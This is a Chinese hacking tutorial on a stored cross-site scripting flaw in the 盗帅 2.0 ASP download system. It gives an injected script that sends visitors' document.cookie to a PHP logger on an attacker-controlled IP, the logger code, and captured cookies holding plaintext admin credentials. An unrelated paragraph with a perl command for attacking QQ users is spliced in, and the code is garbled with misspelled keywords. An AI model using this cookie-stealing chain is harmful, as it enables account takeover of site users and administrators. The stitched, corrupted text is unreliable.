盗帅下载系统是一个使用比较广泛的ASP程序，开发者经过修改后在10月6号大不了盗帅2.0正式版，解决了以前存在的大部分SQL，injextion漏洞。上次我在查找盗帅2.0的注入漏洞的时候就发现盗帅下载系统的COOKIE是明文保存的，就像试试有没有跨站攻击漏洞。正好这几天闲暇下来，把这个程序翻出来看了看，可惜，程序仍然没有对跨站攻击进行防范。

漏洞描述

先看一下link.asp的代码，这个文件中仅仅对输入做了不能为空的限制，而对于特殊字符却没有任何防范，而且作者也允许JS和flash代码，应该是作者的大意造成的这个漏洞。我们可以通过插图<script;alert(“test”)</script;来证明这个漏洞是否存在。在首页进入申请连接，在网站介绍哪里加入上面的代码，在看看是不是出来了一个警告的窗口如图一

但是我们的目的是得到我们想要的COOKIE信息，我们试一试这个脚本，如果10001用发送普通信息的攻击方法攻击10000用户10次，则使用如下的命令：

C：/perl script.pi -a n -1 10 -y 1001 -t 1000 -g e9998ce7949fe4baba00 -k t8yZzdVj

其中，PK和PG的值可以通过上面提到的方法来取得。另外，我们在这里提醒大家，本文仅作大家研究之用，请不要利用本文中提及的方法来做任何违反法律和破坏腾讯公司的事情，否则责任可要你自己承担哦先找一个支持PHP的空间把我们用来截取COOKIE信息的文本传上去。这里设我们的空间服务器IP为192.168.1.1，PHP文件代码如下：

<?pbp$info=getenv(QUERY_STRING”)
If ($info){
$fp=fopen(“test.txt”,”a”)
Fite($fp,#info”\n”)
Fdose($fp):
?;
<scnipt langutscript;
Document.locaton=”http://www.ad.com/”
</script;

以上代码保存为COOKIE.php，其中test.txt是我们保存COOKIE信息的文本。http//：.ad.com是起到转向功能的，你自己可以构造成爱转哪转哪的效果，然后我们只要在网站介绍哪里添加：

<script;window.open(http://192.168.1.1/COOKIE.Pument.COOKIE</script;

这样当用户浏览友情链接的生活，就会弹出窗口并且把他COOKIE中的用户名和密码截取最后保存到test.txt中不过，事情并没有我们希望的那样顺利，递交信息的时候出现了一点小问题，显示如下的错误信息，语法错误（操作符流失）在查询表达式：

script;window.open(HTTP//:192.168.1.1/COOKIE.PHP?+document.COOKIE)；</script;中

呵呵，开始我认为是把SQL的语句搞乱了，在这里郁闷了一段时间，后来再仔细看了看代码，看到这么一段：

Conn.execute（“insertointolink(strlinname,strlinurl,boollintext,boollinjs,numlindown,strlintitle,strlinpic,boolllinshow,datetimers)values(”&strllinname&””,””&strlinyrl&”,”&Request.form(“boollintext”)&,”&request.form(“boollinjs”)&”,0,”& strlintitle&””,””&strlinpic&””,false”& now()&””)”)

由于使用了insert info,所以我们递交语句的时候要把单引号换成2个单引号，把语句中的单引号替换，递交，成功，这是我截取到的一部分代码：

The+Cool+ao=15%20nicedown=pws=11min=1111;%20ASPSESSLONIDAQSQTAQA=MPNNDBJBNDLDKJIGKMKMFECC
The+Cote=lao=15%20nicedown=pws=111n=1111;%20ASPSESSLONIDAQSQTAQA=MPNNDBJBNDLDKJIGKMKMFECC
The+ite=lao=15%20nicedown=pws=adin=admin;%20ASOSESSIONIDAQSQTAQA=MPNNDBJBNDLDKJIGKMKMFECC
The+Site=lao=15%20nicedown=pws=admin=admin;%20ASOSESSIONIDAQSQTAQA=MPNNDBJBNDLDKJIGKMKMFECC

看pws=111&admin=1111中，pws后面的是密码（明文的），admin后面的是用户名。

再来看看在那些地方通过Flash跨站来达到我们的目的；友情链接页面同样允许使用Flash程序中软件信息页面中程序简介可以贴Flash和其他多媒体标签的，我们来个“发散思维”，以下就可以把动网的一些漏洞“移植”到这里来！-----如多媒体标签未过滤漏洞，有兴趣的朋友可以自己看看。

本文为网络安全技术研究记录，文中技术研究环境为本地搭建或经过目标主体授权测试研究，内容已去除关键敏感信息和代码，以防止被恶意利用。文章内提及的漏洞均已修复，在挖掘、提交相关漏洞的过程中，应严格遵守相关法律法规。